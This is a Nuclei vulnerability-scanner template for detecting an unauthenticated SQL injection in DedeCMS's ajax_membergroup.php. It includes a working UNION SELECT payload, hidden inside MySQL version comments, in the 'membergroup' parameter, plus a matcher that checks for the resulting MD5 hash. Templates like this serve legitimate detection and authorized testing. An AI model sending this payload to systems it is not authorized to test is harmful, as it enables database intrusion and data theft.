nuclei-templates/vulnerabilities/other/dedecms-membergroup-sqli.yaml

27 lines
755 B
YAML
Raw Normal View History

2021-03-15 08:01:47 +00:00
id: dedecms-membergroup-sqli
info:
name: DedeCMS Membergroup SQLI
author: pikpikcu
severity: medium
2021-10-14 12:55:59 +00:00
description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
2021-03-15 08:01:47 +00:00
reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html
tags: sqli,dedecms
requests:
- method: GET
path:
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`"
matchers-condition: and
matchers:
- type: word
words:
2021-07-21 13:04:37 +00:00
- "52c69e3a57331081823331c4e69d3f2e"
2021-03-15 08:01:47 +00:00
part: body
- type: status
status:
- 200